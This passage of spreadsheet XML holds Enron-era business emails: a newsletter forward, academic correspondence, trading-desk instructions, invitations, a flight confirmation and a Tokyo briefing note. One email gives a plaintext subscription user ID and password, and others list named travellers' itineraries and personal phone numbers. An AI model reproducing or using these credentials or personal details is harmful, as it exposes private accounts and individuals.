I was sorry not to meet with you last week when I was in Houston - I hope you _x000D_
had a good holiday._x000D_
Per my meeting with Sara here is the status report on the ISDAs we are _x000D_
negotiating for EnronCredit.com Ltd._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 00:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'clement.abrams@enron.com', 'david.nutt@enron.com', 'robert.vote@enron.com', 'daniel.rogers@enron.com', 'jim.armogida@enron.com', 'drew.fossum@enron.com', 'rex.rogers@enron.com', 'sharon.butcher@enron.com', 'kriste.sullivan@enron.com'})</t>
  </si>
  <si>
    <t>FW: June 7 -- BNA, Inc. Antitrust &amp; Trade Regulation Daily</t>
  </si>
  <si>
    <t>User iD:  enronatd_x000D_
PW:        bnaweb22_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  "BNA Highlights" &lt;bhighlig@bna.com&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22BNA+20Highlights+22+20+3Cbhighlig+40bna+2Ecom+3E+40ENRON_x000D_
@ENRON.com] _x000D_
Sent: Wednesday, June 06, 2001 11:07 PM_x000D_
To: BNA Highlights_x000D_
Subject: June 7 -- BNA, Inc. Antitrust &amp; Trade Regulation Daily_x000D_
_x000D_
___________________________________x000D_
_x000D_
ANTITRUST &amp; TRADE REGULATION DAILY_x000D_
Highlights_x000D_
Thursday, June 7, 2001_x000D_
___________________________________x000D_
_x000D_
ISSN 1526-520X_x000D_
_x000D_
Registered Web subscribers can access the full text of these_x000D_
articles by using the URL link supplied._x000D_
_x000D_
Information about becoming a subscriber or signing up for a_x000D_
FREE Web trial is available at http://web.bna.com or call_x000D_
BNA  Customer Relations at 1-800-372-1033, Mon. - Fri. 8:30_x000D_
am - 7:00 pm (ET)._x000D_
___________x000D_
_x000D_
HIGHLIGHTS_x000D_
___________x000D_
_x000D_
SIXTH CIRCUIT AFFIRMS SUMMARY DISPOSITION OF UROKINASE CASE_x000D_
IN UNPUBLISHED OPINION_x000D_
The summary disposition of a Sherman Act Section 1 and_x000D_
Section 2 attack on an exclusive supply contract for a raw_x000D_
material used to produce urokinase, a broad category of_x000D_
thrombolytics used for treating clinical conditions caused_x000D_
by blood clots, is upheld in an unpublished opinion by the_x000D_
U.S. Court of Appeals for the Fourth Circuit ("Microbix_x000D_
Biosystems, Inc. v. BioWhittaker, Inc., "4th Cir., No._x000D_
00-2262, 6/4/01)._x000D_
_x000D_
http://pubs.bna.com/ip/BNA/atd.nsf/id/A0A4G7D9H5__x000D_
_x000D_
COURT ENJOINS TUMS COMMERCIAL, FINDS CLAIM FOR RIVAL PRODUCT_x000D_
TO BE LITERALLY TRUE_x000D_
The manufacturer of Tums(R) may need to take a more costly_x000D_
competing product as a result of a decision by the U.S._x000D_
District Court for the Southern District of New York, which_x000D_
upholds a competitor's comparative advertising while_x000D_
enjoining a Tums commercial as literally false in violation_x000D_
of Lanham Act Section 43(a) ("SmithKline Beecham Consumer_x000D_
Healthcare, L.P. v. Johnson &amp; Johnson-Merck Consumer_x000D_
Pharmaceuticals Co., "S.D.N.Y., No. 01 Civ. 2775 (DAB),_x000D_
6/1/01)._x000D_
_x000D_
http://pubs.bna.com/ip/BNA/atd.nsf/id/A0A4G7D9K4__x000D_
_x000D_
STATE REGULATORS OK, WITH CONDITIONS, ON VERIZON BID TO SELL_x000D_
LONG-DISTANCE SERVICE_x000D_
Regulators in Pennsylvania June 6 told Verizon Pennsylvania_x000D_
they would support the phone company's planned application_x000D_
to the Federal Communications Commission seeking to provide_x000D_
long-distance services in the state, provided the company_x000D_
meets several conditions._x000D_
_x000D_
http://pubs.bna.com/ip/BNA/atd.nsf/id/A0A4G7D9P9__x000D_
_x000D_
REGULATORY RECIPROCITY COULD OFFER SOLUTION TO COMPETITION_x000D_
IN CANADIAN BANKING SECTOR_x000D_
OTTAWA--Permitting foreign banks to do business directly in_x000D_
Canada under the oversight of their home country regulators_x000D_
would solve Canada's current problem of maintaining_x000D_
sufficient competition in the retail banking sector,_x000D_
according to a study released on May 29 by the C.D. Howe_x000D_
Institute._x000D_
_x000D_
http://pubs.bna.com/ip/BNA/atd.nsf/id/A0A4G7D9R1__x000D_
_x000D_
___________x000D_
Antitrust &amp; Trade Regulation Daily (ISSN 1526-520X)_x000D_
Highlights are published daily by The Bureau of National_x000D_
Affairs, Inc., 1231 25th St., NW, Washington, DC 20037._x000D_
_x000D_
For account information and changes, contact 1-800-372-1033_x000D_
(M-F, 8:30 am-7:00 pm ET)_x000D_
_x000D_
To request retransmission or to order a copy of the_x000D_
summarized article, contact 1-800-452-7773 or e-mail_x000D_
bnaplus@bna.com._x000D_
_x000D_
For copyright guidelines, go to_x000D_
http://www.bna.com/corp/copyright._x000D_
_x000D_
Copyright (c) 2001 by The Bureau of National Affairs, Inc._x000D_
Washington, D.C.  20037.  Use of this service is subject to_x000D_
the terms and conditions of the license agreement with BNA._x000D_
Unauthorized access or distribution is prohibited.</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 01:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Good morning</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
Two items.  Unless you have an objection, I plan to ship the paper on to_x000D_
Don Chew at the journal this morning.  We can still work on the article but_x000D_
he needs something to begin the editing process._x000D_
_x000D_
Second, in the same issue as our paper will appear the transcript of a_x000D_
roundtable discussion involving Sheridan titman, John McCormack (Stern_x000D_
stewart), Ron Erd (Southern Energy), Jeff Sandifer (president of sandifer_x000D_
capital--$700 million undermanagement), and Gene Humphries.  Attached you_x000D_
will find a section THAT WILL NOT BE IN THE FINAL DOCUMENT, but that I_x000D_
thought you might like to read in light of our own discussions over the_x000D_
course of writing this paper._x000D_
_x000D_
Have a great day._x000D_
_x000D_
john_x000D_
_x000D_
 - Interview_outtakes.doc_x000D_
_x000D_
John D. Martin_x000D_
Carr P. Collins Chair in Finance_x000D_
Finance Department_x000D_
Baylor University_x000D_
PO Box 98004_x000D_
Waco, TX 76798_x000D_
254-710-4473 (Office)_x000D_
254-710-1092 (Fax)_x000D_
J_Martin@Baylor.edu_x000D_
web:    http://hsb.baylor.edu/html/martinj/home.html  </t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 08:01:25 -0800 (PST)</t>
  </si>
  <si>
    <t>Cut deals</t>
  </si>
  <si>
    <t>Group-_x000D_
_x000D_
As we have more and more cuts, we have an excellant opportunity to refine our cut technique. (YES!)_x000D_
_x000D_
 1.) In path confirmation workspace-please check all cut paths as "confirmed" (this will allow us to sort for cut or "confirmed" paths later)-and enter notes in the comment section regarding the cut._x000D_
_x000D_
2.) ZERO OUT CUT SCHEDULES IN DEAL SCHEDULING. On imports to CALI, please zero out the purchase outside of CALI, zero out the EpmiCalPool, and then make a purchase under the book that had the import (likely EPMI Short Term Cali) from the California Imbalance (remember no price and 24 POS on the group)._x000D_
_x000D_
IF you have any questions, please call me. We are having a nightmare taking care of weekend cuts, particularly imports into California._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bill</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 08:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'linda.shwab@morganstanley.com'})</t>
  </si>
  <si>
    <t>Harvard Club Invitation - Byron R. Wien</t>
  </si>
  <si>
    <t>Byron R. Wien, Managing Director and Chief U.S. Investment Strategist, Morgan _x000D_
Stanley, will be in Houston and presenting his views on the U.S. capital _x000D_
markets and the economy.? Mr. Wein received his A.B. from Harvard College and _x000D_
his M.B.A. from Harvard Business School. Details follow.? _x000D_
_x000D_
clip_image002.jpg?_x000D_
_x000D_
is proud to invite you _x000D_
to a special evening with _x000D_
_x000D_
?_x000D_
_x000D_
Byron R. Wien_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Managing Director and U. S. Investment Strategist _x000D_
_x000D_
Morgan Stanley has the world's top-ranked Equity Research department, and a _x000D_
key part of that effort is Byron Wien, consistently one of the most widely _x000D_
read analysts on Wall Street.*? Please join us for a lively and insightful _x000D_
presentation by Mr. Wien on the current environment for investing._x000D_
?_x000D_
_x000D_
Mr. Wien was a portfolio manager for 20 years prior to joining Morgan Stanley _x000D_
in January 1985. He received his A.B. with honors from Harvard College and _x000D_
his M.B.A. with distinction from Harvard Business School._x000D_
_x000D_
_x000D_
?????????????????????????????? Place:?? Doubletree Post Oak _x000D_
_x000D_
?????????????????????????????? 2001 Post Oak Boulevard_x000D_
_x000D_
?????????????????????????????? Date:?? Wednesday, June 6, 2001_x000D_
_x000D_
?????????????????????????????? Time:??????????????? 7:00 PM _x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
Seating is limited, please RSVP 281-316-7500_x000D_
_x000D_
?_x000D_
_x000D_
clip_image003.jpg_x000D_
_x000D_
??????????????????????????????????????????????????? 711 West Bay Area Blvd, _x000D_
Ste 320_x000D_
_x000D_
Webster, Texas 77598_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?????????? #1 Global Research Team, Institutional Investor, January 2001, _x000D_
readership statistics from First Call Corp._x000D_
_x000D_
Morgan Stanley is a service mark of Morgan Stanley Dean Witter &amp; Co.?? _x000D_
Services are offered through Morgan Stanley DW Inc., member SIPC._x000D_
?_x000D_
?Linda Shwab_x000D_
Vice President_x000D_
Branch Manager_x000D_
Southwest Region_x000D_
WWW.MSDW.COM_x000D_
?_x000D_
_x000D_
**** Important Notice to Recipients ****_x000D_
It is important that you do not use e-mail to request, authorize or effect _x000D_
the purchase or sale of any security or commodity, to send fund transfer _x000D_
instructions, or to effect any other transactions.? Any such request, orders, _x000D_
or instructions that you send will not be accepted and will not be processed _x000D_
by Morgan Stanley. _x000D_
_x000D_
_x000D_
 - clip_image002.jpg_x000D_
 - clip_image003.jpg</t>
  </si>
  <si>
    <t>Fri, 5 Nov 1999 11:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'levine@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Macroeconomics in the news</t>
  </si>
  <si>
    <t>It is just an exciting time to be taking macroeconomics..._x000D_
_x000D_
I) Be sure to follow the rise in interest rates in UK, ECB, and US.  We_x000D_
will be discussing the pros &amp; cons of each region's rise.  Try to decide if_x000D_
the ECB or the FT editorials (today pp. 12 &amp; 13) are correct on the need_x000D_
for the ECB rate increase._x000D_
_x000D_
II) You might also glance at articles on falling real estate prices in_x000D_
Japan (p. 4), and the article on Daewoo's bankruptcy (p. 12)._x000D_
_x000D_
III) Yesterday's FT had a long editorial on markets for the inputs into_x000D_
global warming (Thurs. 11/4, p. 14).  What are the pros and cons of markets_x000D_
for controlling externalities of this global sort?_x000D_
_x000D_
IV) Hint: A typical set of exam questions might be..._x000D_
Consider one of the following nations that have had special sections in the_x000D_
FT this term: Ireland, Brazil or Ghana._x000D_
1. What is are 1 or 2 of the most serious threats to short-run growth in_x000D_
GDP for this nation?_x000D_
2. What short-run fiscal or monetary policies are appropriate?_x000D_
3. What is are 1 or 2 of the most serious threats to short-run growth in_x000D_
GDP for this nation?_x000D_
4. What longer-term policies are appropriate?_x000D_
_x000D_
These are just the sections of this week, and I do not promise to give a_x000D_
large selection of nations (although I will give &gt; 1 unless I choose Japan,_x000D_
Russia, or the EC)._x000D_
_x000D_
David I. Levine                 Associate professor_x000D_
Haas School of Business    ph: 510/642-1697_x000D_
University of California    fax: 510/643-1420_x000D_
Berkeley CA  94720-1900                            email:_x000D_
levine@haas.berkeley.edu_x000D_
http://web.haas.berkeley.edu/www/levine/</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 07:54:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travel@expedia.com'})</t>
  </si>
  <si>
    <t>Expedia.com Flight Purchase Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Your E-ticket is confirmed._x000D_
_x000D_
You will not receive a paper receipt, itinerary, or confirmation letter automatically._x000D_
Airport security and airline check-in locations require government issued photo_x000D_
identification, such as a driver's license or passport. In addition, you must provide_x000D_
proof of current date travel, such as a printed copy of your itinerary or a printed_x000D_
receipt. You can access this documentation from the itinerary in your My Trips page:_x000D_
http://expedia.com/pub/agent.dll?qscr=litn_x000D_
_x000D_
If you have any questions concerning this requirement, please contact your airline_x000D_
directly, or refer to our e-ticket frequently asked questions:_x000D_
http://expedia.com/pub/eta.dll?qscr=hgen&amp;hfnm=h_FW_etix.htx_x000D_
_x000D_
_x000D_
_x000D_
For flight check-in and departure information, please_x000D_
contact your airline directly._x000D_
_x000D_
Your flight information appears below. It is also available online_x000D_
at the My Trips page at Expedia.com:_x000D_
http://expedia.com/pub/agent.dll?qscr=litn_x000D_
_x000D_
You can also make or review your car and hotel reservations from the_x000D_
same page._x000D_
_x000D_
If you are thinking about changing your flights, you can use our_x000D_
Exchange Calculator to find out what change penalties apply and what_x000D_
the new fare would be:_x000D_
http://expedia.com/pub/agent.dll?qscr=ewvs&amp;itid=28817822_x000D_
_x000D_
If you need to get in touch with us about your flights, send an e-mail_x000D_
to http://www.expedia.com/pub/agent.dll?qscr=itin&amp;itid=28817822 or simply_x000D_
reply to this message. You can also reach our customer service_x000D_
team 24 hours a day at 1 (800) EXPEDIA (1-800-397-3342)._x000D_
_x000D_
We're committed to providing you with the best travel service available_x000D_
anywhere, and we want to hear what you think. Please let us know how_x000D_
we're doing by filling out our online survey:_x000D_
http://expedia.com/daily/survey/survey.asp_x000D_
_x000D_
For information about your destination, please refer to our online_x000D_
guidebook, the Destination Guides:_x000D_
http://expedia.com/wg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Our security systems review purchases for potential credit card misuse._x000D_
If we have any problems processing your transaction, we will contact you._x000D_
Otherwise, you can assume your purchase is confirmed_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
Travelers: Paul Thomas, Willis Philip_x000D_
FLIGHT SUMMARY_x000D_
--------------------------------------------------------------------------------_x000D_
E-Ticket Confirmed_x000D_
Itinerary Number: 12881782219_x000D_
Round Trip_x000D_
Booking ID: MD5OB2_x000D_
2 adults $331.16_x000D_
Taxes: $70.84_x000D_
_x000D_
Total Cost: $402.00_x000D_
_x000D_
Flight: from Houston, TX (IAH-Bush Intercontinental) to Albany, NY (ALB-Albany County)_x000D_
Depart: 15-Oct-01 at  8:40 AM_x000D_
Arrive: 15-Oct-01 at  2:46 PM_x000D_
_x000D_
	Depart: Houston (IAH), 15-Oct-01 at  8:40 AM_x000D_
	Arrive: Atlanta (ATL), 15-Oct-01 at 11:36 AM_x000D_
	Flight: Delta 1004_x000D_
	Aircraft:  MDC MD80_x000D_
	Meal Service: n/a_x000D_
	Duration: 1hr 56mn_x000D_
	Distance: 691 mi (1112 km)_x000D_
	Economy/Coach Class_x000D_
_x000D_
	Depart: Atlanta (ATL), 15-Oct-01 at 12:30 PM_x000D_
	Arrive: Albany (ALB), 15-Oct-01 at  2:46 PM_x000D_
	Flight: Delta 1884_x000D_
	Aircraft:  Boeing 727-200_x000D_
	Meal Service: Snack_x000D_
	Duration: 2hr 16mn_x000D_
	Distance: 853 mi (1373 km)_x000D_
	Economy/Coach Class_x000D_
_x000D_
Flight: from Albany, NY (ALB-Albany County) to Houston, TX (IAH-Bush Intercontinental)_x000D_
Depart: 16-Oct-01 at  8:15 PM_x000D_
Arrive: 17-Oct-01 at 12:38 AM_x000D_
_x000D_
	Depart: Albany (ALB), 16-Oct-01 at  8:15 PM_x000D_
	Arrive: Atlanta (ATL), 16-Oct-01 at 10:46 PM_x000D_
	Flight: Delta 2159_x000D_
	Aircraft:  Boeing 727-200_x000D_
	Meal Service: n/a_x000D_
	Duration: 2hr 31mn_x000D_
	Distance: 853 mi (1373 km)_x000D_
	Economy/Coach Class_x000D_
_x000D_
	Depart: Atlanta (ATL), 16-Oct-01 at 11:40 PM_x000D_
	Arrive: Houston (IAH), 17-Oct-01 at 12:38 AM_x000D_
	Flight: Delta  867_x000D_
	Aircraft:  Boeing 727-200_x000D_
	Meal Service: n/a_x000D_
	Duration: 1hr 58mn_x000D_
	Distance: 691 mi (1112 km)_x000D_
	Economy/Coach Class_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
Please read important information governing Airline Liability Limitations:_x000D_
http://www.expedia.com/pub/agent.dll?qscr=fmtd&amp;irgf=3&amp;hdri=1_x000D_
_x000D_
Proof of citizenship is required for international travel.  Most countries_x000D_
require a valid passport, though some require only a birth certificate and photo ID._x000D_
Some countries also require visas.  To learn about entry requirements, or to purchase_x000D_
a passport or visa, visit the Express Visa Service Web site:_x000D_
http://www.expedia.com/exptrack/evs/default.asp_x000D_
_x000D_
_x000D_
_x000D_
Have a great trip!_x000D_
_x000D_
Expedia.com Travel Team_x000D_
Don't Just Travel. Travel Right._x000D_
http://www.expedia.com/_x000D_
_x000D_
_x000D_
When you use the American Express Card, you will not be held responsible for unauthorized charges online._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 03:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.musch@enron.com', 'kim.monk@enron.com', 'janice.moore@enron.com', 'jonathan.marsh@enron.com', 'tim.underdown@enron.com', 'robert.vote@enron.com', 'paula.porto@enron.com', 'john.novak@enron.com', "denis.o'connell@enron.com", 'fabian.valle@enron.com', 'tami.scrudder@enron.com', 'rob.walls@enron.com', 'james.maccallon@enron.com', 'sarah.novosel@enron.com', 'bruce.lundstrom@enron.com', 'twanda.sweet@enron.com', 'peter.traung@enron.com', 'adam.umanoff@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'marcus.polach@enron.com', 'lisa.robichaux@enron.com', 'andrew.wu@enron.com', 'suhas.tuljapurkar@enron.com', 'maria.mosciaro@enron.com', 'leesa.white@enron.com', 'jane.wilson@enron.com', 'lou.stoler@enron.com', 'christopher.wood@enron.com', 'richard.shapiro@enron.com', 'david.minns@enron.com', 'tina.livingston@enron.com', 'molly.sample@enron.com', 'rockford.meyer@enron.com', 'kriste.sullivan@enron.com', 'alan.larsen@enron.com', 'allison.mchenry@enron.com', 'paul.simons@enron.com', 'dub.morris@enron.com', 'janet.wood@enron.com', 'miguel.mendoza@enron.com', 'mark.powell@enron.com', 'sara.shackleton@enron.com', 'lee.martin@enron.com', 'robert.quick@enron.com', 'alison.moss@enron.com', 'sarah.sinclair@enron.com', 'shari.stack@enron.com', 'kay.young@enron.com', 'richard.murphy@enron.com', 'mark.metts@enron.com', 'michael.schuh@enron.com', 'robbi.rossi@enron.com', 'beverly.sullivan@enron.com', 'jim.talcott@enron.com', 'tanya.sanford@enron.com', 'vicky.martinez@enron.com', 'robert.mathis@enron.com', 'victor.nieto@enron.com', 'john.rigby@enron.com', 'marc.manly@enron.com', 'sophie.martin@enron.com', 'sean.long@enron.com', 'christie.patrick@enron.com', 'kathleen.magruder@enron.com', 'martin.rosell@enron.com', 'davis.maxey@enron.com', 'john.schwartzenburg@enron.com', 'rex.rogers@enron.com', 'eva.neufeld@enron.com', 'cheryl.nelson@enron.com', 'phil.patman@enron.com', 'peggy.menchaca@enron.com', 'preston.mcglory@enron.com', 'eric.newell@enron.com', 'stephen.wallace@enron.com'})</t>
  </si>
  <si>
    <t>REMINDER -- Law Conference (Distribution List 2)</t>
  </si>
  <si>
    <t xml:space="preserve">     Enron Law Conference_x000D_
_x000D_
        Reminder_x000D_
_x000D_
                   Submit your Online RSVP Form now!_x000D_
_x000D_
The deadline for replying to the 2001 Enron Law Conference is fast _x000D_
approaching!  Please go to  http://lawconference.corp.enron.com and fill out _x000D_
your Online RSVP Form.  Don't forget to respond if you will be attending the _x000D_
Thursday night awards dinner as well.  Once you have submitted your RSVP _x000D_
Form, you should receive a confirmation e-mail.  Please review your _x000D_
confirmation information and let me know if there are any changes._x000D_
_x000D_
Remember, responses must be submitted no later than Friday, March 30, 2001.  _x000D_
See you in San Antonio! _x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 02:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Kristina,_x000D_
_x000D_
Congratulations. Well deserved._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 09:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'insights@cera.com'})</t>
  </si>
  <si>
    <t>CERA Conference Call and Web PresentationThe Final Wave of RTO_x000D_
 Filings: The Ball is in FERC's Court - CERA Conference Call</t>
  </si>
  <si>
    <t>Title: CERA Conference Call and Web Presentation=01*The Final Wave of RTO=_x000D_
=20_x000D_
Filings: The Ball is in FERC's Court_x000D_
URL: http://www20.cera.com/eprofile?u=3D35&amp;m=3D2243_x000D_
_x000D_
_x000D_
ELECTRIC TRANSMISSION and NORTH AMERICAN ELECTRIC POWER CONFERENCE CALL and_x000D_
WEB PRESENTATION_x000D_
_x000D_
A Cambridge Energy Research Associates Conference Call &amp; Web Presentation_x000D_
_x000D_
TOPIC_x000D_
The Final Wave of RTO Filings--The Ball is in FERC's Court_x000D_
_x000D_
* Some Surprises from the Independent System Operators_x000D_
_x000D_
* Will the Deadline Be Met?  The Countdown to December 15, 2001_x000D_
_x000D_
* The FERC: A Soft Stance on RTO Filings?_x000D_
_x000D_
FORMAT_x000D_
At the time listed  below, our speakers will address this topic for_x000D_
approximately 30 minutes, with accompanying graphics presented on the=20_x000D_
internet,_x000D_
followed by an open question and answer period._x000D_
_x000D_
SPEAKERS_x000D_
David Clement, CERA Associate Director, Electric Transmission_x000D_
Hope Robertson, CERA Senior Associate, North American Electric Power_x000D_
Larry Makovich, CERA Senior Director, North American Electric Power_x000D_
_x000D_
TIME_x000D_
1:00 P.M. Eastern, Thursday, February 22, 2001_x000D_
_x000D_
ELIGIBILITY_x000D_
Clients eligible to participate in this conference call are those who=20_x000D_
subscribe_x000D_
to the Electric Transmission Advisory Service or the North American Electri=_x000D_
c_x000D_
Power Advisory Service._x000D_
_x000D_
TO ENROLL_x000D_
To enroll, please return this form via fax to Kari Paakaula at (617) 497-04=_x000D_
23,_x000D_
or enroll via e-mail at kpaakaula@cera.com before 4:00 P.M., Wednesday,_x000D_
February 21, 2001._x000D_
_x000D_
For the audio portion of the call, please call in on one of the following_x000D_
numbers approximately 10-15 minutes before the call:_x000D_
_x000D_
AUDIO &amp; INTERNET_x000D_
Within the United States:  1-800-946-0715_x000D_
Outside the United States:  (719) 457-2643_x000D_
Confirmation Code: 507712_x000D_
Title of  the call:  CERA Call_x000D_
_x000D_
For the internet portion of the call (audio is by telephone), log on to the_x000D_
internet approximately 15-30 minutes before the presentation to ensure_x000D_
technological compatibility._x000D_
_x000D_
1. Point your browser to http://vcast.premconf.com. (Do not include WWW_x000D_
in the URL)_x000D_
2. At the VisionCast Home Page, click on "Attend a Private Conference."_x000D_
3. Follow all directions given regarding additional technology required_x000D_
(if any)._x000D_
4. You will be prompted for an Event Name, your name, and your company name=_x000D_
._x000D_
Event Name: vc507712_x000D_
5. Fill in all fields and click "Continue."_x000D_
_x000D_
System Requirements and Suggestions:_x000D_
* Internet connection not reliant on the phone line you will use for the ca=_x000D_
ll._x000D_
_x000D_
* A Java-enabled browser, such as Microsoft Internet Explorer 3.02 or highe=_x000D_
r;_x000D_
Netscape Navigator 3.02 or higher; or Sun Hot JAVA(tm)_x000D_
_x000D_
* Close all desktop applications and disable your screen saver_x000D_
_x000D_
Technical Assistance:_x000D_
U.S. callers: If you are experiencing difficulties during the call, you may_x000D_
signal for technical assistance by pressing *0 (star, zero) on your telepho=_x000D_
ne_x000D_
keypad after you have connected to the audio portion of the conference._x000D_
_x000D_
International callers: Please re-dial and ask  the operator for assistance_x000D_
before giving the confirmation code._x000D_
_x000D_
For more information, please contact Kari Paakaula via e-mail at_x000D_
kpaakaula@cera.com or via telephone at (617) 441-1362._x000D_
_x000D_
A recording of this call (audio only) will be available until March 22, 200=_x000D_
1._x000D_
To access this recording, please call 1-888-203-1112 (within the U.S.) or_x000D_
(719) 457-0820 (outside the U.S.). Please use confirmation number 507712 to=_x000D_
=20_x000D_
access the call._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for full report._x000D_
_x000D_
*********************************************************_x000D_
Come Shoot the Rapids with us at CERAWeek2001, "Shooting the Rapids:_x000D_
Strategies and Risks for the Energy Future" in Houston, February 12-16,_x000D_
2001!_x000D_
For more information and to register, please visit_x000D_
http://www20.cera.com/ceraweek/_x000D_
*********************************************************_x000D_
_x000D_
_x000D_
E-mail Category: Conference Call_x000D_
CERA Knowledge Area(s): North American Power,_x000D_
_x000D_
**********************************************************************_x000D_
To make changes to your cera.com account go to:_x000D_
http://www20.cera.com/client/updateaccount_x000D_
_x000D_
Forgot your username and password? Go to:_x000D_
http://www20.cera.com/client/forgot_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
Terms of Use: http://www20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2001. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 07:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meeting - - Trading Policy</t>
  </si>
  <si>
    <t xml:space="preserve">please find out when/where this meeting is and get me in on it--also, is this _x000D_
attachment the same document that Tony sent me and I sent to you to print?  _x000D_
thanks df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 10/02/2000 _x000D_
02:30 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Dan Fancler                           10/02/2000 02:30 PM_x000D_
	_x000D_
_x000D_
To: Tony Pryor/ET&amp;S/Enron@ENRON, Drew Fossum@ENRON, Lee _x000D_
Ferrell/ET&amp;S/Enron@Enron, Bob Chandler/ET&amp;S/Enron@Enron_x000D_
cc: Maria Perales/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: Meeting - - Trading Policy  _x000D_
_x000D_
Revised Trading Policy.  We would like to get together in room 4263 to review _x000D_
your comments and make changes as necessary._x000D_
_x000D_
Thanks, Dan_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nick.west@linklaters.com'})</t>
  </si>
  <si>
    <t>frozenset({'justin.boyd@enron.com', 'marly.didizian@linklaters.com', 'dave.samuels@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>RE: Euro 2000 Proposed Site Nav. and Language</t>
  </si>
  <si>
    <t>Dear all_x000D_
_x000D_
Apologies for the "non-opening" attachments. I hope these work._x000D_
_x000D_
Nick_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dave.Samuels@enron.com [mailto:Dave.Samuels@enron.com]_x000D_
Sent: 07 June 2000 17:12_x000D_
To: marly.didizian@linklaters.com; Justin.Boyd@enron.com;_x000D_
Mark.Taylor@enron.com_x000D_
Cc: nick.west@linklaters.com_x000D_
Subject: Euro 2000 Proposed Site Nav. and Language_x000D_
_x000D_
_x000D_
_x000D_
I have attached two documents that describe how to play Minute Mania, and_x000D_
the proposed navigation and language for the contest site.  Please add the_x000D_
appropriate language that we would like to see, and return comments to me_x000D_
as soon as possible so that we can increase the probability of success when_x000D_
we see the site for approval Friday morning._x000D_
_x000D_
thanks_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: MinuteMania-pagelayout commentsNM&amp;DS.doc)_x000D_
_x000D_
_x000D_
(See attached file: Minute Mania-howtoplay comments NM&amp;DS.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
This message is confidential. It may also be privileged or_x000D_
otherwise protected by work product immunity or other legal_x000D_
rules. If you have received it by mistake please let us know_x000D_
by reply and then delete it from your system; you should not_x000D_
copy the message or disclose its contents to anyone._x000D_
_____________________________________________________________x000D_
_x000D_
 - Minute Mania-howtoplay comments NMDS - amended.doc_x000D_
 - MinuteMania-pagelayout commentsNMDS - amended.doc</t>
  </si>
  <si>
    <t>SK - I've printed this out &amp; put it in your meeting folder.  mm_x000D_
_x000D_
Steve, I attach a briefing paper for your visit. A hard copy will be _x000D_
available for you on arrival. The paper includes the following:_x000D_
Itinerary_x000D_
Conference details_x000D_
Brattle paper summary_x000D_
Media interview background_x000D_
General key messages_x000D_
Electricity wholesaling reactive statement_x000D_
Political update_x000D_
Meeting briefing notes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
You will note one further change to the itinerary. We will be meeting with _x000D_
METI rather than the Fair Trade Commission. The purpose of the METI meeting _x000D_
will be to explain our concerns with the current regulatory environment and _x000D_
Enron Japan's proposal to temporarily suspend its electricity wholesaling _x000D_
activities. We met with our METI working level contacts today to brief them _x000D_
on Brattle and in particular the shortcomings of the current system. We did _x000D_
not discuss suspension of our wholesaling activities. The meeting briefing _x000D_
notes will be available on your arrival in Tokyo._x000D_
_x000D_
_x000D_
I also attach the latest version of the Brattle paper and, for completeness, _x000D_
the final version of the presentation and notes. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I will call you at the Palace Hotel on Monday at 6pm. If you have any hiccups _x000D_
with arrangements please let me know. My contact numbers are as follows:_x000D_
_x000D_
Home 813 52610539_x000D_
Mobile 8190 27334795_x000D_
Office 813 5219 4583_x000D_
_x000D_
I think we have stirred things up enough here in the last couple of days to _x000D_
make for an interesting visit for you. I look forward to seeing you on Monday._x000D_
_x000D_
kind regards</t>
  </si>
  <si>
